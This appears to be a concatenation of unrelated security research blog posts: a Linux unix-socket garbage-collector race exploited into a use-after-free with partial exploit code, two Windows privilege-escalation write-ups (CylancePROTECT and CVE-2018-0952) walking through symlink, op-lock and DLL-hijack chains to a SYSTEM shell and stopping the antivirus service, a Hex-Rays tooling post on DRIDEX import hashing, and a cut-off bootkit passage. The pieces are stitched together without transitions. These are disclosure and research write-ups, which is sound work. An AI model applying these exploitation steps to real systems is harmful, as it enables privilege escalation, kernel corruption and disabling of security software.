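/* Round a TSC deadline down to the previous LAPIC timer edge. The ratio is
 * machine-specific (117 on the Tiger Lake laptop above). */
static uint64_t prev_lapic_edge(uint64_t tsc_deadline, uint64_t tsc_crystal_ratio)
{
        return tsc_deadline - (tsc_deadline % tsc_crystal_ratio);
}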
I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.
(No) surprise: clock speed matters
Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.
Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.
Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.
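(For reference, the same APERF/MPERF ratio can also be sampled from userspace through the msr driver - this is a sketch of the idea, not the kernel helper described next, and it needs root plus the msr module loaded:)

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

#define MSR_IA32_MPERF 0xe7
#define MSR_IA32_APERF 0xe8

static uint64_t rdmsr(int msr_fd, uint32_t reg)
{
        uint64_t val = 0;
        pread(msr_fd, &val, sizeof(val), reg);      /* /dev/cpu/N/msr is indexed by MSR number */
        return val;
}

int main(void)
{
        int fd = open("/dev/cpu/0/msr", O_RDONLY);  /* needs root and the msr module */
        uint64_t a0 = rdmsr(fd, MSR_IA32_APERF), m0 = rdmsr(fd, MSR_IA32_MPERF);
        usleep(1000);                                /* short sampling window */
        uint64_t a1 = rdmsr(fd, MSR_IA32_APERF), m1 = rdmsr(fd, MSR_IA32_MPERF);
        /* current frequency ~= base (MPERF) frequency * delta(APERF) / delta(MPERF) */
        printf("APERF/MPERF ratio: %f\n", (double)(a1 - a0) / (double)(m1 - m0));
        return 0;
}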
I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):
So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.
But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)
Causing a UAF
Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!
To turn this bug into memory corruption, we have to abuse that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:
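A rough sketch of that setup (not the author's PoC, and the counts are illustrative): queue tiny SKBs on sockets whose only remaining reference is an inflight SCM_RIGHTS message, so the GC has candidates with long receive queues to scan:

#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Send fd over the unix socket `via` as SCM_RIGHTS ancillary data. */
static void send_fd(int via, int fd)
{
        char c = 0;
        struct iovec iov = { .iov_base = &c, .iov_len = 1 };
        union { char buf[CMSG_SPACE(sizeof(int))]; struct cmsghdr hdr; } u = { 0 };
        struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                              .msg_control = u.buf, .msg_controllen = sizeof(u.buf) };
        struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
        cm->cmsg_level = SOL_SOCKET;
        cm->cmsg_type = SCM_RIGHTS;
        cm->cmsg_len = CMSG_LEN(sizeof(int));
        memcpy(CMSG_DATA(cm), &fd, sizeof(int));
        sendmsg(via, &msg, 0);
}

/* Each p[0] ends up referenced only by an inflight SKB in carrier_sock's queue,
 * with lots of tiny SKBs queued on it for the GC to walk. */
static void bloat_gc(int carrier_sock)
{
        for (int i = 0; i < 100; i++) {
                int p[2];
                socketpair(AF_UNIX, SOCK_DGRAM, 0, p);
                for (int j = 0; j < 100; j++)
                        send(p[1], "A", 1, MSG_DONTWAIT);  /* tiny SKBs on p[0]'s receive queue */
                send_fd(carrier_sock, p[0]);
                close(p[0]);                               /* only the inflight reference remains */
                close(p[1]);
        }
}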
To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():
/* All candidates should have been detached by now. */
BUG_ON(!list_empty(&gc_candidates));
gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().
But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.
I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.
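For completeness, here's a generic sketch of the userfaultfd part - just the standard setup for a buffer whose first access blocks, not the exact trickery from the PoC:

#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Return a page-sized buffer registered with userfaultfd: the first access to
 * it (e.g. recvmsg() copying data into it) blocks until the fault is resolved,
 * which lets us choose when recvmsg() gets to continue. */
static void *make_stalling_buffer(int *uffd_out)
{
        long page = sysconf(_SC_PAGESIZE);
        int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);
        struct uffdio_api api = { .api = UFFD_API };
        ioctl(uffd, UFFDIO_API, &api);

        void *buf = mmap(NULL, page, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        struct uffdio_register reg = {
                .range = { .start = (uintptr_t)buf, .len = page },
                .mode  = UFFDIO_REGISTER_MODE_MISSING,
        };
        ioctl(uffd, UFFDIO_REGISTER, &reg);

        *uffd_out = uffd;   /* resolve later with UFFDIO_COPY to unblock the reader */
        return buf;
}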
When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:
general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI
Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and turns out, time is a complicated concept...
This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.
Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)
Appendix: How impatient are interrupts?
I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.
On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register (a rough sketch of that harness follows the loop listing), while running this loop:
400680: 91000442 add x2, x2, #0x1
400684: 91000421 add x1, x1, #0x1
400688: 9ac20820 udiv x0, x1, x2
40068c: 91006800 add x0, x0, #0x1a
400690: 91000400 add x0, x0, #0x1
400694: 91000442 add x2, x2, #0x1
400698: 91000421 add x1, x1, #0x1
40069c: 91000442 add x2, x2, #0x1
4006a0: 91000421 add x1, x1, #0x1
4006a4: 9ac20820 udiv x0, x1, x2
4006a8: 91006800 add x0, x0, #0x1a
4006ac: 91000400 add x0, x0, #0x1
4006b0: 91000442 add x2, x2, #0x1
4006b4: 91000421 add x1, x1, #0x1
4006b8: 91000442 add x2, x2, #0x1
4006bc: 91000421 add x1, x1, #0x1
4006c0: 17fffff0 b 400680 <main+0xe0>
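A rough sketch of that sampling harness (arm64 field names; on x86-64 the PC would come from uc_mcontext.gregs[REG_RIP] instead; error handling omitted):

#include <signal.h>
#include <time.h>
#include <ucontext.h>

static unsigned long samples[1 << 16];
static volatile unsigned int n_samples;

/* Signal handler: record the PC of the interrupted code. */
static void on_tick(int sig, siginfo_t *info, void *ctx)
{
        ucontext_t *uc = ctx;
        (void)sig; (void)info;
        samples[n_samples++ & 0xffff] = uc->uc_mcontext.pc;   /* arm64 PC */
}

/* Fire a 100Hz interval timer that delivers SIGALRM to the process. */
static void start_sampling(void)
{
        struct sigaction sa = { .sa_sigaction = on_tick, .sa_flags = SA_SIGINFO };
        sigaction(SIGALRM, &sa, NULL);

        timer_t timer;
        struct sigevent sev = { .sigev_notify = SIGEV_SIGNAL, .sigev_signo = SIGALRM };
        timer_create(CLOCK_MONOTONIC, &sev, &timer);

        struct itimerspec its = {
                .it_value    = { .tv_nsec = 10 * 1000 * 1000 },
                .it_interval = { .tv_nsec = 10 * 1000 * 1000 },   /* 100 Hz */
        };
        timer_settime(timer, 0, &its, NULL);
}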
The logged interrupt PCs had the following distribution on a slow in-order core:
and this distribution on a fast out-of-order core:
As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?
With the following loop, which has a LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:
4006a0: 91000442 add x2, x2, #0x1
4006a4: 91000421 add x1, x1, #0x1
4006a8: 9ac20820 udiv x0, x1, x2
4006ac: 91006800 add x0, x0, #0x1a
4006b0: 91000400 add x0, x0, #0x1
4006b4: 91000442 add x2, x2, #0x1
4006b8: 91000421 add x1, x1, #0x1
4006bc: 91000442 add x2, x2, #0x1
4006c0: 91000421 add x1, x1, #0x1
4006c4: 9ac20820 udiv x0, x1, x2
4006c8: 91006800 add x0, x0, #0x1a
4006cc: 91000400 add x0, x0, #0x1
4006d0: 91000442 add x2, x2, #0x1
4006d4: f9400061 ldr x1, [x3]
4006d8: 91000421 add x1, x1, #0x1
4006dc: 91000442 add x2, x2, #0x1
4006e0: 91000421 add x1, x1, #0x1
4006e4: 17ffffef b 4006a0 <main+0x100>
the cache-missing loads obviously have a large influence on the timing. On the in-order core:
On the OOO core:
What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)
On an X86 Skylake CPU, we can do a similar test:
11b8: 48 83 c3 01 add $0x1,%rbx
11bc: 48 83 c0 01 add $0x1,%rax
11c0: 48 01 d8 add %rbx,%rax
11c3: 48 83 c3 01 add $0x1,%rbx
11c7: 48 83 c0 01 add $0x1,%rax
11cb: 48 01 d8 add %rbx,%rax
11ce: 48 03 02 add (%rdx),%rax
11d1: 48 83 c0 01 add $0x1,%rax
11d5: 48 83 c3 01 add $0x1,%rbx
11d9: 48 01 d8 add %rbx,%rax
11dc: 48 83 c3 01 add $0x1,%rbx
11e0: 48 83 c0 01 add $0x1,%rax
11e4: 48 01 d8 add %rbx,%rax
11e7: eb cf jmp 11b8 <main+0xf8>
with a similar result:
This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)
If you regularly perform penetration tests, red team exercises, or endpoint assessments, chances are you've encountered CylancePROTECT at some point. Depending on the CylancePROTECT policy configuration, your standard tools and techniques may not have worked as expected. I've run into situations where the administrators of CylancePROTECT set the policy to be too relaxed and establishing a presence on the target system was trivial. With that said, I've also encountered targets where the policy was very strict and gaining a stable, reliable shell was not an easy task.
After a few frustrating CylancePROTECT encounters, I decided to install it locally and learn more about how it works to try and make my next encounter less frustrating. The majority of CylancePROTECT is written in .NET, so I started by firing up dnSpy, loaded the assemblies, and started looking around. I spent several nights and weekends casually looking through the codebase (which is quite massive) and found myself spending most of my time analyzing how the CylanceUI process communicated with the CylanceSvc process. My hope was that I would find a secret command I could use to stop the service as a user, but no such command exists (for users). However, I did find a privilege escalation vulnerability that could be triggered as a user via the inter-process communication ("IPC") channels.
Several commands can be sent to the CylanceSvc from the CylanceUI process via the tray menu, some of which are enabled by starting the UI with the advanced flag: CylanceUI.exe /advanced
Prior to starting a deeper investigation of the different menu options, I used Process Monitor to get a high-level view of how CylancePROTECT interacted with Windows when I clicked these menu options. My favorite option ended up being the logging verbosity, not only because it gave me an even deeper insight into what CylancePROTECT was doing, but also because it plays a major role in this privilege escalation vulnerability. The 'Check for Updates' option also caught my eye in procmon because it caused the CyUpdate process to spawn as SYSTEM.
The procmon output I witnessed at this point told me quite a bit and was what made me begin my hunt for a possible privilege escalation vulnerability. The three main indicators were:
As a user, I could communicate with the CylanceSvc service and influence its behavior
As a user, I could trigger the CyUpdate process to spawn with SYSTEM privileges
As a user, I could cause the CylanceUI process to write to the same file/folder as the SYSTEM process
The third indicator is the most important. It’s not uncommon for a user process and system process to share the same resource, but it is uncommon for the user process to have full read/write permissions to that resource. I confirmed the permissions on the log folder and files with icacls:
Having modify permissions on a folder allows it to be set up as a mount point that redirects read/write operations to another location. I confirmed this by using James Forshaw's symboliclink-testing-tools to create a mount point, as well as to try other symbolic link vectors. Before creating the mount point, I made sure to set CylancePROTECT's log level to 'Error' to prevent additional logs from being created after I emptied the log folder.
After creating the mount point, I increased the log verbosity and confirmed the log file was created in the mount point target folder, C:\Windows.
Writing a log file to an arbitrary location is neat but doesn't demonstrate much impact or add value to an attack vector. To gain SYSTEM privileges with this vector, I needed to be able to control the filename that was written, as well as the contents of the file. Neither of these tasks can be accomplished by interacting with CylancePROTECT via the IPC channels. However, I was able to use one of Forshaw's clever symbolic link tricks to control the name of the file. This is done by using two symbolic links that are setup like this:
C:\Program Files\Cylance\Desktop\log mount point folder points to the \RPC Control\ object directory.
\RPC Control\2018-03-20.log symlink points to \??\C:\Windows\evil.dll
One of James' symbolic link testing tools will automatically create this symlink chain by simply specifying the original file and target destination, in this case the command looked like this, CreateSymlink.exe "C:\Program Files\Cylance\Desktop\log\2018-03-20.log" C:\Windows\evil.dll, and the result was:
At this point I've written a file to an arbitrary location with an arbitrary name, and since the CyUpdate.exe process grants Users modify permissions on the "log file", I could overwrite the log contents with the contents of a DLL.
From here all I needed to get a SYSTEM shell was a DLL hijack in a SYSTEM service. I decided to target CylancePROTECT for this because I knew I could reliably spawn the CyUpdate process as a user. Leveraging Procmon again, I set my filters to:
Path contains .dll
Result contains NOT
Process is CyUpdate.exe
The resulting output in procmon looked like this:
Now all I had to do was setup the chain again, but this time point the symlink to C:\Program Files\Cylance\Desktop\libc.dll (any of the highlighted locations would have worked). This symlink gave me a modifiable DLL that I could force CylancePROTECT to load and execute, resulting in a SYSTEM shell:
Elevating our privileges from a user to SYSTEM is great, but more importantly, we meet the conditions required to communicate with the CylancePROTECT kernel driver CYDETECT. This elevated privilege allows us to send the ENABLE_STOP IOCTL code to the kernel driver and gracefully stop the service. In the screenshot above, you’ll notice the CylanceSvc is stopped as a result of loading the DLL.
Privilege escalation vulnerabilities via symbolic links are quite common. James Forshaw has found many of them in Windows and other Microsoft products. The initial identification of these types of bugs can be performed without ever opening IDA or doing any sort of static analysis, as I’ve demonstrated above. With that said, it is still a good idea to find the offending code and determine if it’s within a library that affects multiple services or an isolated issue.
Preventing symbolic link attacks may not be as easy as you would think. From a developer’s perspective, these types of vulnerabilities don’t stand out like a SQLi, XSS, or RCE bug since they’re typically a hard to spot permissions issue. When privileged services need to share file system resources with low-privileged users, it is very important that the user permissions are minimal.
Upon finding this vulnerability, Cylance was contacted, and a collaborative effort was made through Bugcrowd to remediate the finding. Cylance responded to the submission quickly and validated the finding within a few days. The fix was deployed 40 days after the submission and was included in the 1470 release of CylancePROTECT.
If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson
Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0003.
The CVE assigned to this vulnerability is: CVE-2018-10722
Process Monitor has become a favorite tool of mine for both research and development. During development of offensive security tools, I frequently use it to monitor how the tools interact with Windows and how they might be detected. Earlier this year I noticed some interesting behavior while I was debugging some code in Visual Studio and monitoring with Procmon. Normally I set up exclusion filters for Visual Studio processes to reduce the noise, but prior to setting up the filters I noticed a SYSTEM process writing to a user-owned directory:
When a privileged service writes to a user-owned resource, it opens up the possibility of a symlink attack vector, as previously shown in the Cylance privilege escalation bug I found. With the goal of identifying how I could directly influence the service's behavior, I began my research into the Standard Collector Service by reviewing the service's loaded libraries:
The library paths indicated the Standard Collector Service was a part of Visual Studio's diagnostics tools. After reviewing the libraries and executables in the related folders, I identified several of the binaries were written in .NET, including a standalone CLI tool named VSDiagnostics.exe, here is the console output:
Loading VSDiagnostics into dnSpy revealed a lot about the tool as well as how it interacts with the Standard Collector Service. First, an instance of IStandardCollectorService is acquired and a session configuration is used to create an ICollectionSession:
Next, agents are added to the ICollectionSession with a CLSID and DLL name, which also stood out as an interesting user-controlled behavior. It also reminded me of previous research that exploited this exact DLL loading behavior. At this point, it looked like the Visual Studio Standard Collector Service was very similar to, or the same as, the Diagnostics Hub Standard Collector Service included with Windows 10. I began investigating this assumption by using OleViewDotNet to query the services for their supported interfaces:
Viewing the proxy definition of the IStandardCollectorService revealed other familiar interfaces, specifically the ICollectionSession interface seen in the VSDiagnostics source:
Taking note of the Interface ID ("IID"), I returned to the .NET interop library to compare the IIDs and found that they were different:
Looking deeper into the .NET code, I found that these Visual Studio specific interfaces are loaded through the proxy DLLs:
A quick review of the ManualRegisterInterfaces function in the DiagnosticsHub.StandardCollector.Proxy.dll showed a simple loop that iterates over an array of IIDs. Included in the array of IIDs is one belonging to the ICollectionSession:
After I had a better understanding of the Visual Studio Collector service, I wanted to see if I could reuse the same .NET interop code to control the Windows Collector service. In order to interact with the correct service, I had to replace the Visual Studio CLSIDs and IIDs with the correct Windows Collector service CLSIDs and IIDs. Next, I used the modified code to build a client that simply created and started a diagnostics session with the collector service:
Starting Procmon and running the client resulted in several files and folders being created in the specified C:\Temp scratch directory. Analyzing these events in Procmon showed that the initial directory creation was performed with client impersonation:
Although the initial directory was created while impersonating the client, the subsequent files and folders were created without impersonation:
After taking a deeper look at the other file operations, there were several that stood out. The image below is an annotated breakdown of the various file operations performed by the Standard Collector Service:
The most interesting behavior is the file copy operation that occurs during the diagnostics report creation. The image below shows the corresponding call stack and events of this behavior:
Now that I had identified user-influenced behaviors, I constructed a possible arbitrary file creation exploit plan:
Obtain op-lock on merged ETL file ({GUID}.1.m.etl) as soon as service calls CloseFile
Find and convert report sub-folder as mount point to C:\Windows\System32
Replace contents of {GUID}.1.m.etl with malicious DLL
Release op-lock to allow ETL file to be copied through the mount point
Start new collection session with copied ETL as agent DLL, triggering elevated code execution
To write the exploit, I extended the client from earlier by leveraging James Forshaw's NtApiDotNet C# library to programmatically create the op-lock and mount point. The images below show the code snippet used to acquire the op-lock and the corresponding Procmon output illustrating the loop and op-lock acquisition:
Acquiring an op-lock on the file essentially stops the CopyFile race, allows the contents to be overwritten, and provides control of when the CopyFile occurs. Next, the exploit looks for the Report folder and scans it for the randomly named subdirectory that needs to be converted to a mount point. Once the mount point is successfully created, the contents of the .etl are replaced with a malicious DLL. Finally, the .etl file is closed and the op-lock is released, allowing the CopyFile operation to continue. The code snippet and Procmon output for this step are shown in the images below:
There are several techniques for escalating privileges through an arbitrary file write, but for this exploit, I chose to use the Collector service's agent DLL loading capability to keep it isolated to a single service. You'll notice in the image above that I did not use the mount point + symlink trick to rename the file to a .dll, because DLLs can be loaded with any extension. For the purpose of this exploit, the DLL simply needed to be in the System32 folder for the Collector service to load it. The image below demonstrates successful execution of the exploit and the corresponding Procmon output:
I know that the above screenshots show the exploit was run as the user "Admin", so here is a GIF showing it being run as "bob", a low-privileged user account:
Feel free to try out the SystemCollector PoC yourself. Turning the PoC into a portable exploit for offensive security engagements is a task I'll leave to the reader. The NtApiDotNet library is also a PowerShell module, which should make things a bit easier.
After this bug was patched as part of the August 2018 Patch Tuesday, I began reversing the patch, which was relatively simple. As expected, the patch simply added CoImpersonateClient calls prior to the previously vulnerable file operations, specifically the CommitPackagingResult function in DiagnosticsHub.StandardCollector.Runtime.dll:
As previously mentioned in the Cylance privilege escalation write-up, protecting against symlink attacks may seem easy, but is often overlooked. Any time a privileged service is performing file operations on behalf of a user, proper impersonation is needed in order to prevent these types of attacks.
Upon finding this vulnerability, MSRC was contacted with the vulnerability details and PoC. MSRC quickly triaged and validated the finding and provided regular updates throughout the remediation process. The full disclosure timeline can be found in the Atredis advisory link below.
If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson
Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0004
The CVE assigned to this vulnerability is: CVE-2018-0952
CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service
IDA Pro and the Hex-Rays decompiler are a core part of any toolkit
for reverse engineering and vulnerability research. In a previous blog
post we discussed how the Hex-Rays
API can be used to solve small, well-defined problems commonly
seen as part of malware analysis. Having access to a higher-level
representation of binary code makes the Hex-Rays decompiler a powerful
tool for reverse engineering. However, interacting with the Hex-Rays
API and its underlying data sources can be daunting, making the
creation of generic analysis scripts difficult or tedious.
This blog post introduces the FLARE IDA Decompiler Library
(FIDL), FireEye’s open source library which provides a wrapper
layer around the Hex-Rays API.
Background
Output from the Hex-Rays decompiler is exposed to analysts via an
Abstract Syntax Tree (AST). Out of the box, processing a binary using
the Hex-Rays API means iterating this AST using a tree visitor class
which visits each node in the tree and issues a callback. For every
callback we can check to see what kind of node we are visiting (calls,
additions, assignments, etc.) and then process that node. For more
information on these constructs see our previous blog post.
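As a point of reference, the following is a minimal IDAPython sketch of that default workflow, assuming IDA with the Hex-Rays decompiler available: a ctree_visitor_t subclass whose callback fires for every expression node, checks the node type, and collects direct call targets.

```python
import ida_hexrays
import idc

class CallCollector(ida_hexrays.ctree_visitor_t):
    """Visit every expression node in the AST and record direct call targets."""
    def __init__(self):
        ida_hexrays.ctree_visitor_t.__init__(self, ida_hexrays.CV_FAST)
        self.calls = []

    def visit_expr(self, expr):
        # The callback fires for every node; we must check its type ourselves.
        if expr.op == ida_hexrays.cot_call and expr.x.op == ida_hexrays.cot_obj:
            self.calls.append(idc.get_func_name(expr.x.obj_ea))
        return 0  # 0 = keep walking the tree

cfunc = ida_hexrays.decompile(idc.get_screen_ea())
v = CallCollector()
v.apply_to(cfunc.body, None)
print(v.calls)
```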
The Problem
While powerful, this workflow can be difficult to use when creating
a generic API for several reasons:
The order nodes are visited in is not always obvious based on the decompiler output
When visiting a node, we have no context about where we are in the AST
Any problem which requires multiple steps requires multiple visitors or complicated logic in our callback function
The number of cases to handle when walking up or down the AST can increase exponentially
Handling each of these cases in a single visitor callback function
is untenable, so we need a way to more flexibly interact with the decompiler.
FIDL
FIDL, the FLARE IDA
Decompiler Library, is our implementation of a wrapper around
the Hex-Rays API. FIDL’s main goal is to abstract away the lower level
details of the default decompiler API. FIDL solves multiple problems:
Provides analysts an easy-to-understand API layer which can be used to write more complicated binary processing scripts
Abstracts away the minutiae of processing the AST
Provides helper implementations for commonly needed functionality when working with the decompiler
Provides documented examples on how to use various Hex-Rays APIs
Many of FIDL’s benefits are exposed to users via the controlFlowinator class. When constructing this object, FIDL parses the AST for us and provides a high-level summary of a function using information extracted via the decompiler, including APIs called, their parameters, and a summary of local variables and parameters for the function.
Figure 1 shows a subset of information available via a
controlFlowinator next to the decompilation of the function.
Figure 1: Sample output available as part
of a controlFlowinator
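As a rough illustration, here is a short sketch of constructing a controlFlowinator for the function under the cursor. Note that the import path, constructor arguments, and the calls attribute used below are assumptions based on the description in this post, not verified against FIDL's documentation.

```python
# Hedged sketch: the import path, constructor signature, and the `calls`
# attribute are assumptions based on the description in this post.
from FIDL.decompiler_utils import controlFlowinator
import idc

c = controlFlowinator(ea=idc.get_screen_ea(), blocks=True)

# Assumed: the high-level summary includes the APIs called within the function.
for call in c.calls:
    print(call)
```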
When parsing the AST during construction, the controlFlowinator also
combines nodes representing the same logical expression into a more
digestible form where each block translates roughly to one line of
pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator
representations of the same function.
Figure 2: The default rendering of the
AST of a function
Figure 3: The control flow graph created
by the controlFlowinator for the function shown in Figure 2
Compared to the default AST, this graph is organized by potential
code paths that can be taken through a function. This gives analysts a
much more logical structure to iterate when trying to determine
context for a particular expression.
Readily available access to variables and API calls used in a
function makes creating scripts to leverage the Hex-Rays API much more
straightforward. In our previous blog post we introduced a script
which uses the Hex-Rays API to rename global variables based on the
parameter to GetProcAddress. Figure 4 shows this script rewritten
using the FIDL API. This new script is both easier to understand and
does not rely on manually walking the AST.
Figure 4: Script that uses the FIDL API
to map all calls to GetProcAddress to global variables
Rather than calling GetProcAddress, malware commonly resolves needed imports manually by walking the Export Address Table (EAT) and comparing the hashes of a DLL’s exports against pre-computed values. As an analyst, being able to quickly or automatically map these functions to their intended API makes it easier to identify
which functions we should spend time analyzing. Figure 5 shows an
example of how FIDL can be used to handle these cases. This script
targets a DRIDEX sample with MD5 hash
7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR
key of 0x65C54023 as the hashing algorithm during import resolution.
Figure 5: IDAPython script to
automatically process and markup a DRIDEX sample
Running the above script results in output similar to what is shown
in Figure 6, with comments labeling which functions are resolved.
Figure 6: The script in Figure 5 inserts
comments into the decompiler output annotating decrypted strings
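For reference, a helper like the hedged sketch below could be used to precompute hashes for candidate export names; it assumes the sample simply XORs the CRC32 of the ASCII export name with the key, which is a simplification of whatever the script in Figure 5 actually implements.

```python
import zlib

XOR_KEY = 0x65C54023  # key reported for this DRIDEX sample

def export_hash(name: str) -> int:
    """Assumed scheme: CRC32 of the ASCII export name, XORed with the key."""
    return (zlib.crc32(name.encode("ascii")) ^ XOR_KEY) & 0xFFFFFFFF

# Build a lookup table from hash -> API name for a few candidate exports.
candidates = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc"]
lookup = {export_hash(n): n for n in candidates}
print({hex(h): n for h, n in lookup.items()})
```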
While the Hex-Rays decompiler is a powerful source of information
during reverse engineering, writing generic scripts and plugins using
the default API is difficult and requires handling numerous edge
cases. This post introduced the FIDL library, a wrapper around the Hex-Rays API, which addresses this by reducing the number of low-level details an analyst needs to understand in order to create a script leveraging the decompiler, and which should make the creation of these scripts much faster. In future blog posts we will publish more scripts
and analysis utilizing this library.
The second issue is that reverse engineering all boot records is
impractical. Given the job of determining if a single system is
infected with a bootkit, a malware analyst could acquire a disk image
and then reverse engineer the boot bytes to determine if anything
malicious is present in the boot chain. However, this process takes
time and even an army of skilled reverse engineers wouldn’t scale to
the size of modern enterprise networks. To put this in context, the
compromised enterprise network referenced in our ROCKBOOT blog post had approximately
10,000 hosts. Assuming a minimum
of two boot records per host, a Master Boot Record (MBR) and a Volume
Boot Record (VBR), that is at least 20,000 boot records to analyze! An
initial reaction is probably, “Why not just hash the boot records and
only analyze the unique ones?” One would assume that corporate
networks are mostly homogeneous, particularly with respect to boot
code, yet this is not the case. Using the same network as an example,
the 20,000 boot records reduced to only 6,000 unique records based on
MD5 hash. Table 1 demonstrates this using data we’ve collected across
our engagements for various enterprise sizes.
Enterprise Size (# hosts)    Avg # Unique Boot Records (md5)
100-1000                     428
1000-10000                   4,738
10000+                       8,717
Table 1 – Unique boot records by MD5 hash
Now, the next thought might be, “Rather than hashing the entire
record, why not implement a custom hashing technique where only
subsections of the boot code are hashed, thus avoiding the dynamic
data portions?” We tried this as well. For example, in the case of
Master Boot Records, we used the bytes at the following two offsets to
calculate a hash:
md5( offset[0:218] + offset[224:440] )
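In Python terms, that scheme looks roughly like the sketch below, assuming the raw 512-byte MBR has already been acquired into a bytes object; the two slices skip the dynamic data portions mentioned above, and the file name is a hypothetical placeholder.

```python
import hashlib

def partial_mbr_hash(mbr: bytes) -> str:
    """Hash only the static code regions of a 512-byte MBR,
    skipping the dynamic data portions described above."""
    assert len(mbr) >= 512
    return hashlib.md5(mbr[0:218] + mbr[224:440]).hexdigest()

# Example: read a previously acquired MBR image from disk and hash it.
with open("mbr.bin", "rb") as f:  # hypothetical path to a collected boot record
    print(partial_mbr_hash(f.read()))
```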
In one network this resulted in approximately 185,000 systems
reducing to around 90 unique MBR hashes. However, this technique had
drawbacks. Most notably, it required accounting for numerous special
